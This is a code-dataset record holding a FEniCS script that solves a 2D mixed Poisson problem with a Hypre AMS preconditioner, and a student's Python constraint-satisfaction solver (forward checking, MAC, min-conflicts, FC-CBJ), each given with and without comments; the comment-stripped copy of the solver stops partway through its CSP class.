1c4465c58914ba00924c3db332f745c7350c02b5
| 5,321
|
py
|
Python
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 10
|
2017-06-22T21:05:17.000Z
|
2020-09-25T08:36:59.000Z
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 2
|
2018-04-14T08:43:59.000Z
|
2018-09-19T14:51:46.000Z
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 6
|
2018-04-13T20:33:53.000Z
|
2020-09-25T08:37:01.000Z
|
from dolfin import *
from petsc4py import PETSc
from mpi4py import MPI as pyMPI
from sympy.printing import ccode
import sympy as sp
import numpy as np
from block import block_assemble, block_mat
from block.iterative import MinRes
from block.algebraic.petsc import LU, LumpedInvDiag
from block.block_base import block_base
# MMS utils
def expr_body(expr, **kwargs):
if not hasattr(expr, '__len__'):
# Defined in terms of some coordinates
xyz = set(sp.symbols('x[0], x[1], x[2]'))
xyz_used = xyz & expr.free_symbols
assert xyz_used <= xyz
# Expression params which need default values
params = (expr.free_symbols - xyz_used) & set(kwargs.keys())
# Body
expr = ccode(expr).replace('M_PI', 'pi')
# Default to zero
kwargs.update(dict((str(p), 0.) for p in params))
# Convert
return expr
# Vectors, Matrices as iterables of expressions
else:
return [expr_body(e, **kwargs) for e in expr]
def as_expression(expr, degree=4, **kwargs):
'''Turns sympy expressions to Dolfin expressions.'''
return Expression(expr_body(expr), degree=degree, **kwargs)
def vec(x):
return as_backend_type(x).vec()
def mat(A):
return as_backend_type(A).mat()
class HypreAMS(block_base):
'''AMG auxiliary space preconditioner for Hdiv(0) norm'''
def __init__(self, V, hdiv0=False, bc=None):
# FIXME: lift
assert V.ufl_element().family() == 'Raviart-Thomas'
assert V.ufl_element().degree() == 1
mesh = V.mesh()
assert mesh.geometry().dim() == 2
sigma, tau = TrialFunction(V), TestFunction(V)
a = inner(div(sigma), div(tau))*dx
if not hdiv0:
a += inner(sigma, tau)*dx
f = Constant(np.zeros(V.ufl_element().value_shape()))
L = inner(tau, f)*dx
A, _ = assemble_system(a, L, bc)
# AMS setup
Q = FunctionSpace(mesh, 'CG', 1)
G = DiscreteOperators.build_gradient(V, Q)
pc = PETSc.PC().create(mesh.mpi_comm().tompi4py())
pc.setType('hypre')
pc.setHYPREType('ams')
# Attach gradient
pc.setHYPREDiscreteGradient(mat(G))
# Constant nullspace (in case not mass and bcs)
constants = [vec(interpolate(c, V).vector())
for c in (Constant((1, 0)), Constant((0, 1)))]
pc.setHYPRESetEdgeConstantVectors(*constants)
# NOTE: term mass term is accounted for automatically by Hypre
# unless pc.setPoissonBetaMatrix(None)
if hdiv0: pc.setHYPRESetBetaPoissonMatrix(None)
pc.setOperators(mat(A))
# FIXME: some defaults
pc.setFromOptions()
pc.setUp()
self.pc = pc
self.A = A # For creating vec
def matvec(self, b):
if not isinstance(b, GenericVector):
return NotImplemented
x = self.A.create_vec(dim=1)
if len(x) != len(b):
raise RuntimeError(
'incompatible dimensions for PETSc matvec, %d != %d'%(len(x),len(b)))
self.pc.apply(vec(b), vec(x))
return x
def main(n):
'''Solves grad-div problem in 2d with HypreAMS preconditioning'''
# Exact solution
x, y = sp.symbols('x[0] x[1]')
u = sp.sin(pi*x*(1-x)*y*(1-y))
sp_div = lambda f: f[0].diff(x, 1) + f[1].diff(y, 1)
sp_grad = lambda f: sp.Matrix([f.diff(x, 1), f.diff(y, 1)])
sigma = sp_grad(u)
f = -sp_div(sigma) + u
sigma_expr, u_expr, f_expr = list(map(as_expression, (sigma, u, f)))
# The discrete problem
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'RT', 1)
Q = FunctionSpace(mesh, 'DG', 0)
W = (V, Q)
sigma, u = list(map(TrialFunction, W))
tau, v = list(map(TestFunction, W))
a00 = inner(sigma, tau)*dx
a01 = inner(div(tau), u)*dx
a10 = inner(div(sigma), v)*dx
a11 = -inner(u, v)*dx
L0 = inner(Constant((0, 0)), tau)*dx
L1 = inner(-f_expr, v)*dx
AA = block_assemble([[a00, a01], [a10, a11]])
bb = block_assemble([L0, L1])
# b00 = inner(sigma, tau)*dx + inner(div(sigma), div(tau))*dx
# B00 = LU(assemble(b00))
B00 = HypreAMS(V)
b11 = inner(u, v)*dx
B11 = LumpedInvDiag(assemble(b11))
BB = block_mat([[B00, 0], [0, B11]])
AAinv = MinRes(AA, precond=BB, tolerance=1e-10, maxiter=500, show=2)
# Compute solution
sigma_h, u_h = AAinv * bb
sigma_h, u_h = Function(V, sigma_h), Function(Q, u_h)
niters = len(AAinv.residuals) - 1
# error = sqrt(errornorm(sigma_expr, sigma_h, 'Hdiv', degree_rise=1)**2 +
# errornorm(u_expr, u_h, 'L2', degree_rise=1)**2)
hmin = mesh.mpi_comm().tompi4py().allreduce(mesh.hmin(), pyMPI.MIN)
error = 1.
return hmin, V.dim()+Q.dim(), niters, error
# --------------------------------------------------------------------------
if __name__ == '__main__':
msg = 'hmin = %g #dofs = %d, niters = %d, error = %g(%.2f)'
h0, error0 = None, None
for n in (8, 16, 32, 64, 128, 256, 512, 1024):
h, ndofs, niters, error = main(n)
if error0 is not None:
rate = ln(error/error0)/ln(h/h0)
else:
rate = -1
h0, error0 = h, error
print((msg % (h, ndofs, niters, error, rate)))
| 28.454545
| 85
| 0.577147
|
from dolfin import *
from petsc4py import PETSc
from mpi4py import MPI as pyMPI
from sympy.printing import ccode
import sympy as sp
import numpy as np
from block import block_assemble, block_mat
from block.iterative import MinRes
from block.algebraic.petsc import LU, LumpedInvDiag
from block.block_base import block_base
def expr_body(expr, **kwargs):
if not hasattr(expr, '__len__'):
xyz = set(sp.symbols('x[0], x[1], x[2]'))
xyz_used = xyz & expr.free_symbols
assert xyz_used <= xyz
params = (expr.free_symbols - xyz_used) & set(kwargs.keys())
expr = ccode(expr).replace('M_PI', 'pi')
kwargs.update(dict((str(p), 0.) for p in params))
return expr
else:
return [expr_body(e, **kwargs) for e in expr]
def as_expression(expr, degree=4, **kwargs):
return Expression(expr_body(expr), degree=degree, **kwargs)
def vec(x):
return as_backend_type(x).vec()
def mat(A):
return as_backend_type(A).mat()
class HypreAMS(block_base):
def __init__(self, V, hdiv0=False, bc=None):
assert V.ufl_element().family() == 'Raviart-Thomas'
assert V.ufl_element().degree() == 1
mesh = V.mesh()
assert mesh.geometry().dim() == 2
sigma, tau = TrialFunction(V), TestFunction(V)
a = inner(div(sigma), div(tau))*dx
if not hdiv0:
a += inner(sigma, tau)*dx
f = Constant(np.zeros(V.ufl_element().value_shape()))
L = inner(tau, f)*dx
A, _ = assemble_system(a, L, bc)
Q = FunctionSpace(mesh, 'CG', 1)
G = DiscreteOperators.build_gradient(V, Q)
pc = PETSc.PC().create(mesh.mpi_comm().tompi4py())
pc.setType('hypre')
pc.setHYPREType('ams')
pc.setHYPREDiscreteGradient(mat(G))
constants = [vec(interpolate(c, V).vector())
for c in (Constant((1, 0)), Constant((0, 1)))]
pc.setHYPRESetEdgeConstantVectors(*constants)
if hdiv0: pc.setHYPRESetBetaPoissonMatrix(None)
pc.setOperators(mat(A))
pc.setFromOptions()
pc.setUp()
self.pc = pc
self.A = A
def matvec(self, b):
if not isinstance(b, GenericVector):
return NotImplemented
x = self.A.create_vec(dim=1)
if len(x) != len(b):
raise RuntimeError(
'incompatible dimensions for PETSc matvec, %d != %d'%(len(x),len(b)))
self.pc.apply(vec(b), vec(x))
return x
def main(n):
x, y = sp.symbols('x[0] x[1]')
u = sp.sin(pi*x*(1-x)*y*(1-y))
sp_div = lambda f: f[0].diff(x, 1) + f[1].diff(y, 1)
sp_grad = lambda f: sp.Matrix([f.diff(x, 1), f.diff(y, 1)])
sigma = sp_grad(u)
f = -sp_div(sigma) + u
sigma_expr, u_expr, f_expr = list(map(as_expression, (sigma, u, f)))
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'RT', 1)
Q = FunctionSpace(mesh, 'DG', 0)
W = (V, Q)
sigma, u = list(map(TrialFunction, W))
tau, v = list(map(TestFunction, W))
a00 = inner(sigma, tau)*dx
a01 = inner(div(tau), u)*dx
a10 = inner(div(sigma), v)*dx
a11 = -inner(u, v)*dx
L0 = inner(Constant((0, 0)), tau)*dx
L1 = inner(-f_expr, v)*dx
AA = block_assemble([[a00, a01], [a10, a11]])
bb = block_assemble([L0, L1])
B00 = HypreAMS(V)
b11 = inner(u, v)*dx
B11 = LumpedInvDiag(assemble(b11))
BB = block_mat([[B00, 0], [0, B11]])
AAinv = MinRes(AA, precond=BB, tolerance=1e-10, maxiter=500, show=2)
sigma_h, u_h = AAinv * bb
sigma_h, u_h = Function(V, sigma_h), Function(Q, u_h)
niters = len(AAinv.residuals) - 1
hmin = mesh.mpi_comm().tompi4py().allreduce(mesh.hmin(), pyMPI.MIN)
error = 1.
return hmin, V.dim()+Q.dim(), niters, error
if __name__ == '__main__':
msg = 'hmin = %g #dofs = %d, niters = %d, error = %g(%.2f)'
h0, error0 = None, None
for n in (8, 16, 32, 64, 128, 256, 512, 1024):
h, ndofs, niters, error = main(n)
if error0 is not None:
rate = ln(error/error0)/ln(h/h0)
else:
rate = -1
h0, error0 = h, error
print((msg % (h, ndofs, niters, error, rate)))
| true
| true
|
1c4465f3d1f0ed123bf563d4a6cfd6d59515b5f0
| 25,549
|
py
|
Python
|
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | 1
|
2022-01-09T17:33:26.000Z
|
2022-01-09T17:33:26.000Z
|
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | null | null | null |
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | null | null | null |
import itertools
import random
import re
import string
from collections import defaultdict, Counter
from functools import reduce
from operator import eq, neg
import time
# from sortedcontainers import SortedSet
import search
from utils import argmin_random_tie, count, first, extend
variables = []
domains = {}
domtemp = {}
template = []
conlist = []
neighbors = {}
with open('dom2-f24.txt','r') as file: #diabazoyme to arxeio
# reading each line
for line in file:
# reading each word
for word in line.split():
template.append(int(word)) #prosthetoyme se mia lista gia thn eykolh xthsh toy
template.pop(0)
x=0
j=0
for i in range(1,len(template)): #Dhmioyrgiea dictionary me kleidi to prwto noymero kai value ola ta ypoloipa
if i==x+1:
j = template[i]
continue
if j==0:
x = i
continue
if template[x] in domtemp:
domtemp[template[x]].append(template[i])
else:
domtemp[template[x]] = [template[i]]
j-=1
file.close()#kleisimo arxeioy
template.clear()
i=0
with open('var2-f24.txt','r') as file: #lista metavlhtwn
# reading each line
for line in file:
# reading each word
for word in line.split():
i+=1
template.append(int(word))
if i%2==0:
variables.append(int(word))
file.close()
template.pop(0)
for i in range(1,len(template)): #Dhmioyrgia toy dicitonary domains
if i%2 == 1:
domains[template[i-1]] = domtemp[template[i]]
i=0
with open('ctr2-f24.txt','r') as file:#diavazoyme arxeio
# reading each line
for line in file:
# reading each word
if i==0 :
i+=1
continue
for word in line.split():
conlist.append(word) #Lista me tiw le3eis gia thn eykolh diaxeirhsh toy
if i%4==1: #Dhmioyrgia twn goitwnwn
temp = int(word)
if int(word) not in neighbors:
neighbors[int(word)] = []
if i%4==2:
if int(word) not in neighbors:
neighbors[int(word)] = [temp]
else:
neighbors[int(word)].append(temp)
neighbors[temp].append(int(word))
i+=1
file.close()
condict = {}
for i in range(len(conlist)): #Dictionary me ena kleidi mia lista apo 2 metavlhtes
if i%4==0:
condict[(int(conlist[i]),int(conlist[i+1]))] = [conlist[i+2],int(conlist[i+3]),1]
cDict = defaultdict(dict)
for i in condict: #Dictionary gia na psaxnei h synarthsh constraints
cDict[i[0]] [i[1]] = [condict[i][0],condict[i][1], 1]
cDict[i[1]] [i[0]] = [condict[i][0],condict[i][1], 1]
def constraints(A,a,B,b): #Synarthsh poy koitaei an 2 metavlhtes A kai B paroyn tis times a kai b antistoixa ikanopoiei kathe periorismo
constraints.num+=1
if cDict[A][B][0] == '>' and abs(a-b)>cDict[A][B][1]:
return True
elif cDict[A][B][0] == '=' and abs(a-b)==cDict[A][B][1]:
return True
return False
constraints.num = 0 #global timh
class CSP(search.Problem):
"""This class describes finite-domain Constraint Satisfaction Problems.
A CSP is specified by the following inputs:
variables A list of variables; each is atomic (e.g. int or string).
domains A dict of {var:[possible_value, ...]} entries.
neighbors A dict of {var:[var,...]} that for each variable lists
the other variables that participate in constraints.
constraints A function f(A, a, B, b) that returns true if neighbors
A, B satisfy the constraint when they have values A=a, B=b
In the textbook and in most mathematical definitions, the
constraints are specified as explicit pairs of allowable values,
but the formulation here is easier to express and more compact for
most cases (for example, the n-Queens problem can be represented
in O(n) space using this notation, instead of O(n^4) for the
explicit representation). In terms of describing the CSP as a
problem, that's all there is.
However, the class also supports data structures and methods that help you
solve CSPs by calling a search function on the CSP. Methods and slots are
as follows, where the argument 'a' represents an assignment, which is a
dict of {var:val} entries:
assign(var, val, a) Assign a[var] = val; do other bookkeeping
unassign(var, a) Do del a[var], plus other bookkeeping
nconflicts(var, val, a) Return the number of other variables that
conflict with var=val
curr_domains[var] Slot: remaining consistent values for var
Used by constraint propagation routines.
The following methods are used only by graph_search and tree_search:
actions(state) Return a list of actions
result(state, action) Return a successor of state
goal_test(state) Return true if all constraints satisfied
The following are just for debugging purposes:
nassigns Slot: tracks the number of assignments made
display(a) Print a human-readable representation
"""
def __init__(self, variables, domains, neighbors, constraints):
"""Construct a CSP problem. If variables is empty, it becomes domains.keys()."""
super().__init__(())
variables = variables or list(domains.keys())
self.variables = variables
self.domains = domains
self.neighbors = neighbors
self.constraints = constraints
self.curr_domains = None
self.nassigns = 0
self.i=0
def assign(self, var, val, assignment):
"""Add {var: val} to assignment; Discard the old value if any."""
assignment[var] = val
self.nassigns += 1
def unassign(self, var, assignment):
"""Remove {var: val} from assignment.
DO NOT call this if you are changing a variable to a new value;
just call assign for that."""
if var in assignment:
del assignment[var]
def nconflicts(self, var, val, assignment):
"""Return the number of conflicts var=val has with other variables."""
# Subclasses may implement this more efficiently
def conflict(var2):
return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])
return count(conflict(v) for v in self.neighbors[var])
def display(self, assignment):
"""Show a human-readable representation of the CSP."""
# Subclasses can print in a prettier way, or display with a GUI
print(assignment)
# These methods are for the tree and graph-search interface:
def actions(self, state):
"""Return a list of applicable actions: non conflicting
assignments to an unassigned variable."""
if len(state) == len(self.variables):
return []
else:
assignment = dict(state)
var = first([v for v in self.variables if v not in assignment])
return [(var, val) for val in self.domains[var]
if self.nconflicts(var, val, assignment) == 0]
def result(self, state, action):
"""Perform an action and return the new state."""
(var, val) = action
return state + ((var, val),)
def goal_test(self, state):
"""The goal is to assign all variables, with all constraints satisfied."""
assignment = dict(state)
return (len(assignment) == len(self.variables)
and all(self.nconflicts(variables, assignment[variables], assignment) == 0
for variables in self.variables))
# These are for constraint propagation
def support_pruning(self):
"""Make sure we can prune values from domains. (We want to pay
for this only if we use it.)"""
if self.curr_domains is None:
self.curr_domains = {v: list(self.domains[v]) for v in self.variables}
def suppose(self, var, value):
"""Start accumulating inferences from assuming var=value."""
self.support_pruning()
removals = [(var, a) for a in self.curr_domains[var] if a != value]
self.curr_domains[var] = [value]
return removals
def prune(self, var, value, removals):
"""Rule out var=value."""
self.curr_domains[var].remove(value)
if removals is not None:
removals.append((var, value))
def choices(self, var):
"""Return all values for var that aren't currently ruled out."""
return (self.curr_domains or self.domains)[var]
def infer_assignment(self):
"""Return the partial assignment implied by the current inferences."""
self.support_pruning()
return {v: self.curr_domains[v][0]
for v in self.variables if 1 == len(self.curr_domains[v])}
def restore(self, removals):
"""Undo a supposition and all inferences from it."""
for B, b in removals:
self.curr_domains[B].append(b)
# This is for min_conflicts search
def conflicted_vars(self, current):
"""Return a list of variables in current assignment that are in conflict"""
return [var for var in self.variables
if self.nconflicts(var, current[var], current) > 0]
# ______________________________________________________________________________
# Constraint Propagation with AC3
def no_arc_heuristic(csp, queue):
return queue
# def dom_j_up(csp, queue):
# return SortedSet(queue, key=lambda t: neg(len(csp.curr_domains[t[1]])))
def AC3(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
"""[Figure 6.3]"""
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised, checks = revise(csp, Xi, Xj, removals, checks)
if revised:
if not csp.curr_domains[Xi]:
cDict[Xi][Xj][2]+=1 #Au3anoyme to varos toy constraint kata 1
cDict[Xj][Xi][2]+=1
return False, checks # CSP is inconsistent
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
return True, checks # CSP is satisfiable
def revise(csp, Xi, Xj, removals, checks=0):
"""Return true if we remove a value."""
revised = False
for x in csp.curr_domains[Xi][:]:
# If Xi=x conflicts with Xj=y for every possible y, eliminate Xi=x
# if all(not csp.constraints(Xi, x, Xj, y) for y in csp.curr_domains[Xj]):
conflict = True
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
conflict = False
checks += 1
if not conflict:
break
if conflict:
csp.prune(Xi, x, removals)
revised = True
return revised, checks
# Constraint Propagation with AC3b: an improved version
# of AC3 with double-support domain-heuristic
def AC3b(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
# Si_p values are all known to be supported by Xj
# Sj_p values are all known to be supported by Xi
# Dj - Sj_p = Sj_u values are unknown, as yet, to be supported by Xi
Si_p, Sj_p, Sj_u, checks = partition(csp, Xi, Xj, checks)
if not Si_p:
return False, checks # CSP is inconsistent
revised = False
for x in set(csp.curr_domains[Xi]) - Si_p:
csp.prune(Xi, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
if (Xj, Xi) in queue:
if isinstance(queue, set):
# or queue -= {(Xj, Xi)} or queue.remove((Xj, Xi))
queue.difference_update({(Xj, Xi)})
else:
queue.difference_update((Xj, Xi))
# the elements in D_j which are supported by Xi are given by the union of Sj_p with the set of those
# elements of Sj_u which further processing will show to be supported by some vi_p in Si_p
for vj_p in Sj_u:
for vi_p in Si_p:
conflict = True
if csp.constraints(Xj, vj_p, Xi, vi_p):
conflict = False
Sj_p.add(vj_p)
checks += 1
if not conflict:
break
revised = False
for x in set(csp.curr_domains[Xj]) - Sj_p:
csp.prune(Xj, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xj]:
if Xk != Xi:
queue.add((Xk, Xj))
return True, checks # CSP is satisfiable
def partition(csp, Xi, Xj, checks=0):
Si_p = set()
Sj_p = set()
Sj_u = set(csp.curr_domains[Xj])
for vi_u in csp.curr_domains[Xi]:
conflict = True
# now, in order to establish support for a value vi_u in Di it seems better to try to find a support among
# the values in Sj_u first, because for each vj_u in Sj_u the check (vi_u, vj_u) is a double-support check
# and it is just as likely that any vj_u in Sj_u supports vi_u than it is that any vj_p in Sj_p does...
for vj_u in Sj_u - Sj_p:
# double-support check
if csp.constraints(Xi, vi_u, Xj, vj_u):
conflict = False
Si_p.add(vi_u)
Sj_p.add(vj_u)
checks += 1
if not conflict:
break
# ... and only if no support can be found among the elements in Sj_u, should the elements vj_p in Sj_p be used
# for single-support checks (vi_u, vj_p)
if conflict:
for vj_p in Sj_p:
# single-support check
if csp.constraints(Xi, vi_u, Xj, vj_p):
conflict = False
Si_p.add(vi_u)
checks += 1
if not conflict:
break
return Si_p, Sj_p, Sj_u - Sj_p, checks
# Constraint Propagation with AC4
def AC4(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
support_counter = Counter()
variable_value_pairs_supported = defaultdict(set)
unsupported_variable_value_pairs = []
checks = 0
# construction and initialization of support sets
while queue:
(Xi, Xj) = queue.pop()
revised = False
for x in csp.curr_domains[Xi][:]:
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
support_counter[(Xi, x, Xj)] += 1
variable_value_pairs_supported[(Xj, y)].add((Xi, x))
checks += 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks # CSP is inconsistent
# propagation of removed values
while unsupported_variable_value_pairs:
Xj, y = unsupported_variable_value_pairs.pop()
for Xi, x in variable_value_pairs_supported[(Xj, y)]:
revised = False
if x in csp.curr_domains[Xi][:]:
support_counter[(Xi, x, Xj)] -= 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks # CSP is inconsistent
return True, checks # CSP is satisfiable
# ______________________________________________________________________________
# CSP Backtracking Search
# Variable ordering
def first_unassigned_variable(assignment, csp):
"""The default variable order."""
return first([var for var in csp.variables if var not in assignment])
def mrv(assignment, csp):
"""Minimum-remaining-values heuristic."""
return argmin_random_tie([v for v in csp.variables if v not in assignment],
key=lambda var: num_legal_values(csp, var, assignment))
def num_legal_values(csp, var, assignment):
if csp.curr_domains:
return len(csp.curr_domains[var])
else:
return count(csp.nconflicts(var, val, assignment) == 0 for val in csp.domains[var])
def domwdeg(assignment, csp):
csp.support_pruning()
fddg = 100
for var in csp.variables:
if var not in assignment:
dom = len(csp.curr_domains[var])
wdeg = 0
for nei in neighbors[var]:
wdeg+=cDict[var][nei][2]
ddg = dom / wdeg
if fddg > ddg:
fddg = ddg
fvar = var
return fvar
# Value ordering
def unordered_domain_values(var, assignment, csp):
"""The default value order."""
return csp.choices(var)
def lcv(var, assignment, csp):
"""Least-constraining-values heuristic."""
return sorted(csp.choices(var), key=lambda val: csp.nconflicts(var, val, assignment))
# Inference
def no_inference(csp, var, value, assignment, removals):
return True
def forward_checking(csp, var, value, assignment, removals):
"""Prune neighbor values inconsistent with var=value."""
csp.support_pruning()
for B in csp.neighbors[var]:
if B not in assignment:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
#var me B weight++ sto dict
cDict[var][B][2]+=1 #Au3anoyme to varos kata 1
cDict[B][var][2]+=1
return False
return True
def mac(csp, var, value, assignment, removals, constraint_propagation=AC3):
"""Maintain arc consistency."""
return constraint_propagation(csp, {(X, var) for X in csp.neighbors[var]}, removals)
# The search, proper
#fc-dbk einai idio me backtracking
def backtracking_search(csp, select_unassigned_variable=first_unassigned_variable,
order_domain_values=unordered_domain_values, inference=no_inference):
"""[Figure 6.5]"""
def backtrack(assignment):
global start_time
if time.time()-start_time>3000: #An parei perissotero apo 5 lepta stamata to
return None
backtracking_search.num +=1
if len(assignment) == len(csp.variables):
return assignment
var = select_unassigned_variable(assignment, csp)
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
backtracking_search.num = 0
# ______________________________________________________________________________
# Min-conflicts Hill Climbing search for CSPs
def min_conflicts(csp, max_steps=50):
"""Solve a CSP by stochastic Hill Climbing on the number of conflicts."""
# Generate a complete assignment for all variables (probably with conflicts)
csp.current = current = {}
for var in csp.variables:
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
# Now repeatedly choose a random conflicted variable and change it
for _ in range(max_steps):
conflicted = csp.conflicted_vars(current)
if not conflicted:
return current
var = random.choice(conflicted)
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
return None
min_conflicts.num = 0
def min_conflicts_value(csp, var, current):
min_conflicts_value.num +=1
"""Return the value that will give var the least number of conflicts.
If there is a tie, choose at random."""
return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))
min_conflicts_value.num = 0
neighdict={}
for i in variables:
neighdict[i]=set()
def FC(csp, var, value, assignment, removals): #FC algorithm
"""Prune neighbor values inconsistent with var=value."""
csp.support_pruning()
for B in csp.neighbors[var]:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
if B in assignment:
neighdict[var].add(B) #Prosthetoyme ton geitona sthn lista apo set gia to synolo sygkroysewn
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
if var<B:
cDict[var][B][2]+=1
else:
cDict[B][var][2]+=1
return False
return True
def fc_cbj(csp, select_unassigned_variable=domwdeg, #Vasismeno sto backtracking_search
order_domain_values=unordered_domain_values, inference=FC):
"""[Figure 6.5]"""
def backtrack(assignment,myvar=None):
fc_cbj.num+=1
if len(assignment) == len(csp.variables):
return assignment
if myvar==None:
var = select_unassigned_variable(assignment, csp)
else:
var=myvar
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
if neighdict[var]: #An den parei kanena value tote prepei na kanei backjump se sygkekrimenh metavlhth
proo=max(neighdict[var]) #Vriskei thn megalyterh metavlhth giati einai kai ayth poy phge teleytaia
neighdict[var].remove(proo) #Afairoyme to set
neighdict[proo].update(neighdict[var]) #Vazoyme to proigomyeno set ston proorismo
neighdict[var].clear()
backtrack(assignment,proo)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
fc_cbj.num =0
mycsp = CSP(variables,domains,neighbors,constraints)
global start_time
print("\n\nRunning with: forward_checking\n")
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,forward_checking):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: MAC\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,mac):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: min_conflict\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if min_conflicts(mycsp):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",min_conflicts_value.num)
print("\n\nRunning with: FC-CBJ\n")
start_time = time.time()
constraints.num=0
if fc_cbj(mycsp,domwdeg,unordered_domain_values,FC):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",fc_cbj.num)
| 37.682891
| 137
| 0.594309
|
import itertools
import random
import re
import string
from collections import defaultdict, Counter
from functools import reduce
from operator import eq, neg
import time
import search
from utils import argmin_random_tie, count, first, extend
variables = []
domains = {}
domtemp = {}
template = []
conlist = []
neighbors = {}
with open('dom2-f24.txt','r') as file:
for line in file:
for word in line.split():
template.append(int(word))
template.pop(0)
x=0
j=0
for i in range(1,len(template)):
if i==x+1:
j = template[i]
continue
if j==0:
x = i
continue
if template[x] in domtemp:
domtemp[template[x]].append(template[i])
else:
domtemp[template[x]] = [template[i]]
j-=1
file.close()
template.clear()
i=0
with open('var2-f24.txt','r') as file:
for line in file:
for word in line.split():
i+=1
template.append(int(word))
if i%2==0:
variables.append(int(word))
file.close()
template.pop(0)
for i in range(1,len(template)):
if i%2 == 1:
domains[template[i-1]] = domtemp[template[i]]
i=0
with open('ctr2-f24.txt','r') as file:
for line in file:
if i==0 :
i+=1
continue
for word in line.split():
conlist.append(word)
if i%4==1:
temp = int(word)
if int(word) not in neighbors:
neighbors[int(word)] = []
if i%4==2:
if int(word) not in neighbors:
neighbors[int(word)] = [temp]
else:
neighbors[int(word)].append(temp)
neighbors[temp].append(int(word))
i+=1
file.close()
condict = {}
for i in range(len(conlist)):
if i%4==0:
condict[(int(conlist[i]),int(conlist[i+1]))] = [conlist[i+2],int(conlist[i+3]),1]
cDict = defaultdict(dict)
for i in condict:
cDict[i[0]] [i[1]] = [condict[i][0],condict[i][1], 1]
cDict[i[1]] [i[0]] = [condict[i][0],condict[i][1], 1]
def constraints(A,a,B,b):
constraints.num+=1
if cDict[A][B][0] == '>' and abs(a-b)>cDict[A][B][1]:
return True
elif cDict[A][B][0] == '=' and abs(a-b)==cDict[A][B][1]:
return True
return False
constraints.num = 0
class CSP(search.Problem):
def __init__(self, variables, domains, neighbors, constraints):
super().__init__(())
variables = variables or list(domains.keys())
self.variables = variables
self.domains = domains
self.neighbors = neighbors
self.constraints = constraints
self.curr_domains = None
self.nassigns = 0
self.i=0
def assign(self, var, val, assignment):
assignment[var] = val
self.nassigns += 1
def unassign(self, var, assignment):
if var in assignment:
del assignment[var]
def nconflicts(self, var, val, assignment):
def conflict(var2):
return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])
